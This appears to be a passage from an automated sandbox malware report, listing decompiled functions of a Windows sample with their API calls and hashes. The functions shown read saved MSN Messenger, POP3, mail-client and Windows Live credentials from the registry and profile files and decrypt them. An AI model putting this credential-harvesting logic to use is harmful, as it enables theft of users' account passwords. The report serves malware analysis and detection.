                                                                                              				}
                                                                                              				if(_v52 != _t104) {
                                                                                              					_v64 = _v64 + _t80;
                                                                                              				}
                                                                                              				if(_v48 != _t104) {
                                                                                              					_v64 = _v64 + 0xa;
                                                                                              				}
                                                                                              				if(_v44 != _t104) {
                                                                                              					_v64 = _v64 + 0x10;
                                                                                              				}
                                                                                              				if(_v60 != _t104) {
                                                                                              					_v64 = _v64 + 0x11;
                                                                                              				}
                                                                                              				if(_v40 != _t104) {
                                                                                              					_v64 = _v64 + 0x1e;
                                                                                              				}
                                                                                              				if(_v64 <= _t104) {
                                                                                              					if(_v20 != _t104) {
                                                                                              						free(_v20);
                                                                                              					}
                                                                                              					_t81 = 0;
                                                                                              				} else {
                                                                                              					asm("fild dword [esp+0xc]");
                                                                                              					_push(_t106);
                                                                                              					_push(_t106);
                                                                                              					 *_t125 = _t159;
                                                                                              					L004115B8();
                                                                                              					_v36 = _t159;
                                                                                              					 *_t125 =  *0x414500;
                                                                                              					L004115B8();
                                                                                              					asm("fdivr qword [esp+0x30]");
                                                                                              					asm("fistp qword [esp+0x30]");
                                                                                              					_t122 = _v28;
                                                                                              					if(_v20 != _t104) {
                                                                                              						free(_v20);
                                                                                              					}
                                                                                              					_t81 = _t122;
                                                                                              				}
                                                                                              				return _t81;
                                                                                              			}



































                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: free$strlen
                                                                                              • String ID:
                                                                                              • API String ID: 667451143-3916222277
                                                                                              • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                              • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                                                              • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                              • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040D4A6(char* __ebx, void** _a4) {
                                                                                              				int _v8;
                                                                                              				int _v12;
                                                                                              				int _v16;
                                                                                              				void* _v20;
                                                                                              				int _v24;
                                                                                              				char* _v28;
                                                                                              				char _v32;
                                                                                              				char _v556;
                                                                                              				char _v557;
                                                                                              				char _v1578;
                                                                                              				void _v1580;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				long _t39;
                                                                                              				int _t43;
                                                                                              				char _t48;
                                                                                              				char* _t63;
                                                                                              				int* _t67;
                                                                                              
                                                                                              				_t63 = __ebx;
                                                                                              				_t67 = 0;
                                                                                              				_v16 = 0;
                                                                                              				_v12 = 0x400;
                                                                                              				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
                                                                                              				if(_t39 != 0) {
                                                                                              					L13:
                                                                                              					RegCloseKey( *_a4);
                                                                                              					return _v16;
                                                                                              				}
                                                                                              				_t43 = _t39 + 1;
                                                                                              				if(_v12 <= _t43) {
                                                                                              					goto L13;
                                                                                              				}
                                                                                              				_t74 = _v1580 - 0x20;
                                                                                              				_v8 = 0;
                                                                                              				if(_v1580 >= 0x20) {
                                                                                              					_v8 = _t43;
                                                                                              					L10:
                                                                                              					if(_v8 != _t67) {
                                                                                              						_v557 = 0;
                                                                                              						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
                                                                                              						_v8 = 0xff;
                                                                                              						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
                                                                                              						if(_t48 == 0) {
                                                                                              							_t63[0xfe] = _t48;
                                                                                              							_t63[0x1fe] = _t48;
                                                                                              							_v16 = 1;
                                                                                              						}
                                                                                              					}
                                                                                              					goto L13;
                                                                                              				}
                                                                                              				_t69 =  &_v556;
                                                                                              				E004046D7( &_v556);
                                                                                              				if(E004047A0(_t69, _t74) == 0) {
                                                                                              					L8:
                                                                                              					E004047F1( &_v556);
                                                                                              					_t67 = 0;
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				_v32 = _v12 + 0xfffffffe;
                                                                                              				_v28 =  &_v1578;
                                                                                              				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
                                                                                              					goto L8;
                                                                                              				}
                                                                                              				if(_v24 < 0x400) {
                                                                                              					memcpy( &_v1580, _v20, _v24);
                                                                                              					_v8 = 1;
                                                                                              				}
                                                                                              				LocalFree(_v20);
                                                                                              				goto L8;
                                                                                              			}

                                                                                              APIs
                                                                                              • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7554F420), ref: 0040D4D5
                                                                                              • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • memcpy.MSVCRT ref: 0040D546
                                                                                              • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                              • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                              • API String ID: 3289975857-105384665
                                                                                              • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                              • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                                              • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                              • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                                                              				char _v12;
                                                                                              				short* _v16;
                                                                                              				char _v20;
                                                                                              				char* _v24;
                                                                                              				char _v28;
                                                                                              				char _v288;
                                                                                              				char _v544;
                                                                                              				char _v800;
                                                                                              				char _v1056;
                                                                                              				char _v1584;
                                                                                              				void _v2607;
                                                                                              				char _v2608;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t36;
                                                                                              				void* _t63;
                                                                                              				char* _t66;
                                                                                              				void* _t68;
                                                                                              
                                                                                              				_t63 = __ecx;
                                                                                              				_v2608 = 0;
                                                                                              				memset( &_v2607, 0, 0x3ff);
                                                                                              				_v12 = 0x400;
                                                                                              				_v1056 = 0;
                                                                                              				_v800 = 0;
                                                                                              				_v544 = 0;
                                                                                              				_v288 = 0;
                                                                                              				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
                                                                                              				_t72 = _t36;
                                                                                              				if(_t36 != 0) {
                                                                                              					return _t36;
                                                                                              				}
                                                                                              				_t67 =  &_v1584;
                                                                                              				E004046D7( &_v1584);
                                                                                              				if(E004047A0( &_v1584, _t72) != 0) {
                                                                                              					_v24 =  &_v2608;
                                                                                              					_v28 = _v12;
                                                                                              					_t16 =  &_v20; // 0x407221
                                                                                              					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
                                                                                              						_t19 =  &_v20; // 0x407221
                                                                                              						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
                                                                                              						LocalFree(_v16);
                                                                                              						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
                                                                                              						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
                                                                                              						_t28 =  &_a12; // 0x407221
                                                                                              						_t66 =  &_v1056;
                                                                                              						E004060D0(0xff, _t66,  *_t28);
                                                                                              						 *((intOrPtr*)( *_a4))(_t66);
                                                                                              					}
                                                                                              				}
                                                                                              				return E004047F1( &_v1584);
                                                                                              			}

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040708D
                                                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,7554ED80,?), ref: 00407138
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                              • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                                              • API String ID: 604216836-250559020
                                                                                              • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                              • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                                              • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                              • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E00405E46(long __edi, char* _a4) {
                                                                                              				char _v8;
                                                                                              				void* _t8;
                                                                                              				void* _t10;
                                                                                              				long _t14;
                                                                                              				long _t24;
                                                                                              
                                                                                              				_t24 = __edi;
                                                                                              				_t1 = _t24 - 0x834; // -2100
                                                                                              				_t8 = 0;
                                                                                              				_t14 = 0x1100;
                                                                                              				if(_t1 <= 0x383) {
                                                                                              					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                                                                              					if(0 != 0) {
                                                                                              						_t14 = 0x1900;
                                                                                              					}
                                                                                              				}
                                                                                              				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                              					_t10 = strcpy(_a4, "Unknown Error");
                                                                                              				} else {
                                                                                              					if(strlen(_v8) < 0x400) {
                                                                                              						strcpy(_a4, _v8);
                                                                                              					}
                                                                                              					_t10 = LocalFree(_v8);
                                                                                              				}
                                                                                              				return _t10;
                                                                                              			}









                                                                                              APIs
                                                                                              • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                                              • strlen.MSVCRT ref: 00405E96
                                                                                              • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                                              • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                                              • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                              • API String ID: 3198317522-572158859
                                                                                              • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                              • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                                              • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                              • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
                                                                                              				char _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t96;
                                                                                              				signed int _t98;
                                                                                              				void* _t99;
                                                                                              				signed int _t104;
                                                                                              				signed short _t107;
                                                                                              				signed int _t110;
                                                                                              				intOrPtr _t114;
                                                                                              				signed int _t117;
                                                                                              				signed int _t119;
                                                                                              				signed short _t121;
                                                                                              				signed int _t122;
                                                                                              				signed int _t152;
                                                                                              				signed int _t156;
                                                                                              				signed int _t158;
                                                                                              				signed int _t161;
                                                                                              				signed int _t163;
                                                                                              				signed int _t168;
                                                                                              				signed int _t169;
                                                                                              				signed int _t170;
                                                                                              				void* _t172;
                                                                                              				void* _t173;
                                                                                              				void* _t174;
                                                                                              				void* _t178;
                                                                                              				intOrPtr _t180;
                                                                                              
                                                                                              				_t174 = __eflags;
                                                                                              				_t172 = __eax;
                                                                                              				E00408572(__eax);
                                                                                              				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
                                                                                              				_t122 = 0xd;
                                                                                              				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
                                                                                              				_t156 = 0x14;
                                                                                              				_t96 = _t122 * _t156;
                                                                                              				 *(_t172 + 0x1b0) = _t122;
                                                                                              				_push( ~(0 | _t174 > 0x00000000) | _t96);
                                                                                              				L004115D0();
                                                                                              				 *(_t172 + 0x1b4) = _t96;
                                                                                              				_t158 = 0x10;
                                                                                              				_t98 = _t122 * _t158;
                                                                                              				_push( ~(0 | _t174 > 0x00000000) | _t98);
                                                                                              				L004115D0();
                                                                                              				 *(_t172 + 0x34) = _t98;
                                                                                              				_v8 = 0x4168e0;
                                                                                              				do {
                                                                                              					_t21 =  &_v8; // 0x4168e0
                                                                                              					_t99 =  *_t21;
                                                                                              					_t168 =  *_t99;
                                                                                              					_v12 = _t168;
                                                                                              					_t169 = _t168 * 0x14;
                                                                                              					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
                                                                                              					_t24 =  &_v8; // 0x4168e0
                                                                                              					_t104 = _v12 << 4;
                                                                                              					_v12 = _t104;
                                                                                              					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
                                                                                              					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
                                                                                              					_t173 = _t173 + 0x18;
                                                                                              					_v16 = _t107;
                                                                                              					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
                                                                                              					if((_t107 & 0xffff0000) == 0) {
                                                                                              						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
                                                                                              						_t121 = E004078FF(_v16 | 0x00010000);
                                                                                              						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
                                                                                              						_t122 = 0xd;
                                                                                              					}
                                                                                              					_v8 = _v8 + 0x24;
                                                                                              					_t178 = _v8 - 0x416ab4;
                                                                                              				} while (_t178 < 0);
                                                                                              				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
                                                                                              				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
                                                                                              				_t161 = 4;
                                                                                              				_t110 = _t122 * _t161;
                                                                                              				 *(_t172 + 0x20) = _t122;
                                                                                              				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
                                                                                              				_push( ~(0 | _t178 > 0x00000000) | _t110);
                                                                                              				L004115D0();
                                                                                              				_push(0xc);
                                                                                              				 *(_t172 + 0x24) = _t110;
                                                                                              				L004115D0();
                                                                                              				_t170 = _t110;
                                                                                              				if(_t170 == 0) {
                                                                                              					_t170 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					_t114 =  *((intOrPtr*)(_t172 + 0x48));
                                                                                              					_t180 = _t114;
                                                                                              					_a8 = _t114;
                                                                                              					if(_t180 == 0) {
                                                                                              						_a8 = 0x64;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t170 + 8)) = _a4;
                                                                                              					_t163 = 4;
                                                                                              					_t117 = _t122 * _t163;
                                                                                              					 *(_t170 + 4) = _t122;
                                                                                              					_push( ~(0 | _t180 > 0x00000000) | _t117);
                                                                                              					L004115D0();
                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                              					 *_t170 = _t117;
                                                                                              					do {
                                                                                              						_t152 = _a4;
                                                                                              						_t119 = _t152 << 2;
                                                                                              						_a4 = _a4 + 1;
                                                                                              						 *( *_t170 + _t119 + 2) = _t152;
                                                                                              						 *((short*)(_t119 +  *_t170)) = _a8;
                                                                                              					} while (_a4 < _t122);
                                                                                              				}
                                                                                              				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
                                                                                              				 *(_t172 + 0x1a0) = _t170;
                                                                                              				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                                                                              				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                                                                              				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                                                                              				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                                                                              				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                                                                              				return E004086DC(_t172);
                                                                                              			}


































                                                                                              APIs
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                                                              • memcpy.MSVCRT ref: 004087D7
                                                                                              • memcpy.MSVCRT ref: 004087F4
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                              • String ID: d$hA
                                                                                              • API String ID: 3781940870-4030989184
                                                                                              • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                              • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                                                              • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                              • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				char _v188;
                                                                                              				char _v268;
                                                                                              				char _v524;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				char* _t53;
                                                                                              				void* _t60;
                                                                                              				void* _t65;
                                                                                              				char* _t70;
                                                                                              
                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                              				_t65 = __eax;
                                                                                              				 *((intOrPtr*)(__eax + 0x8c)) = 3;
                                                                                              				 *((intOrPtr*)(__eax + 0x210)) = 1;
                                                                                              				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
                                                                                              				if(_v524 == 0x31) {
                                                                                              					 *((intOrPtr*)(_t65 + 0x210)) = 2;
                                                                                              				}
                                                                                              				_v12 = _t65 + 0x110;
                                                                                              				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
                                                                                              				_t70 = _t65 + 0x214;
                                                                                              				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
                                                                                              				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
                                                                                              				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
                                                                                              				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
                                                                                              				if(_v268 != 0) {
                                                                                              					_v188 = 0;
                                                                                              					E00401D5A( &_v268, _t65 + 0x294);
                                                                                              					if( *_t70 == 0) {
                                                                                              						_push(_a8);
                                                                                              						_t60 = 0x7f;
                                                                                              						_push(_t60);
                                                                                              						_push(_t70);
                                                                                              						_push("PopAccount");
                                                                                              						_push(_a4);
                                                                                              						E0040311F();
                                                                                              						if( *_t70 != 0) {
                                                                                              							_t53 = strchr(_t70, 0x40);
                                                                                              							_a8 = _t53;
                                                                                              							if(_t53 != 0) {
                                                                                              								E004060D0(_t60, _v12,  &(_t53[1]));
                                                                                              								 *_a8 = 0;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					_v8 = 1;
                                                                                              				}
                                                                                              				if( *_t70 != 0) {
                                                                                              					_v8 = 1;
                                                                                              				}
                                                                                              				return _v8;
                                                                                              			}















                                                                                              APIs
                                                                                                • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                                              • strchr.MSVCRT ref: 00403262
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                              • API String ID: 1348940319-1729847305
                                                                                              • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                              • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                                              • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                              • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 16%
                                                                                              			E0040F09D(char* __eax, void* __ecx) {
                                                                                              				void* _t2;
                                                                                              				char* _t3;
                                                                                              				void* _t5;
                                                                                              				void* _t6;
                                                                                              				void* _t7;
                                                                                              
                                                                                              				_t3 = __eax;
                                                                                              				_t6 = __ecx;
                                                                                              				_t5 = 4;
                                                                                              				while(1) {
                                                                                              					_t2 =  *_t3;
                                                                                              					if(_t2 != 0x3c) {
                                                                                              						goto L3;
                                                                                              					}
                                                                                              					_push(_t5);
                                                                                              					_push("&lt;");
                                                                                              					L14:
                                                                                              					_t2 = memcpy(_t6, ??, ??);
                                                                                              					_t7 = _t7 + 0xc;
                                                                                              					_t6 = _t6 + _t5;
                                                                                              					L16:
                                                                                              					if( *_t3 != 0) {
                                                                                              						_t3 = _t3 + 1;
                                                                                              						continue;
                                                                                              					}
                                                                                              					return _t2;
                                                                                              					L3:
                                                                                              					if(_t2 != 0x3e) {
                                                                                              						if(_t2 != 0x22) {
                                                                                              							if(_t2 != 0xb0) {
                                                                                              								if(_t2 != 0x26) {
                                                                                              									if(_t2 != 0xa) {
                                                                                              										 *_t6 = _t2;
                                                                                              										_t6 = _t6 + 1;
                                                                                              									} else {
                                                                                              										_push(_t5);
                                                                                              										_push("<br>");
                                                                                              										goto L14;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_push(5);
                                                                                              									_push("&amp;");
                                                                                              									goto L11;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_push(5);
                                                                                              								_push("&deg;");
                                                                                              								L11:
                                                                                              								_t2 = memcpy(_t6, ??, ??);
                                                                                              								_t7 = _t7 + 0xc;
                                                                                              								_t6 = _t6 + 5;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t2 = memcpy(_t6, "&quot;", 6);
                                                                                              							_t7 = _t7 + 0xc;
                                                                                              							_t6 = _t6 + 6;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(_t5);
                                                                                              						_push("&gt;");
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					goto L16;
                                                                                              				}
                                                                                              			}









                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                              • API String ID: 3510742995-3273207271
                                                                                              • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                              • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                                              • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                              • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E0040D865(intOrPtr* _a4) {
                                                                                              				char _v260;
                                                                                              				char _v516;
                                                                                              				void _v771;
                                                                                              				char _v772;
                                                                                              				intOrPtr _v776;
                                                                                              				intOrPtr _v780;
                                                                                              				intOrPtr _v788;
                                                                                              				int _v796;
                                                                                              				char _v800;
                                                                                              				signed int _v804;
                                                                                              				char _v808;
                                                                                              				char _v812;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr* _t52;
                                                                                              				void* _t53;
                                                                                              				void* _t57;
                                                                                              				signed int _t58;
                                                                                              				char* _t65;
                                                                                              				unsigned int _t68;
                                                                                              				intOrPtr _t69;
                                                                                              				void* _t85;
                                                                                              				char* _t89;
                                                                                              				intOrPtr _t92;
                                                                                              				intOrPtr* _t93;
                                                                                              				signed int _t94;
                                                                                              				void* _t96;
                                                                                              
                                                                                              				_t52 = _a4;
                                                                                              				_t96 = (_t94 & 0xfffffff8) - 0x32c;
                                                                                              				_push(_t85);
                                                                                              				 *((intOrPtr*)(_t52 + 4)) = 0;
                                                                                              				 *((intOrPtr*)(_t52 + 8)) = 0;
                                                                                              				_t89 = 0;
                                                                                              				_t53 = E00406278();
                                                                                              				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
                                                                                              				if( *((intOrPtr*)(_t53 + 4)) > 5) {
                                                                                              					_t89 = L"WindowsLive:name=*";
                                                                                              				}
                                                                                              				_v800 = 0;
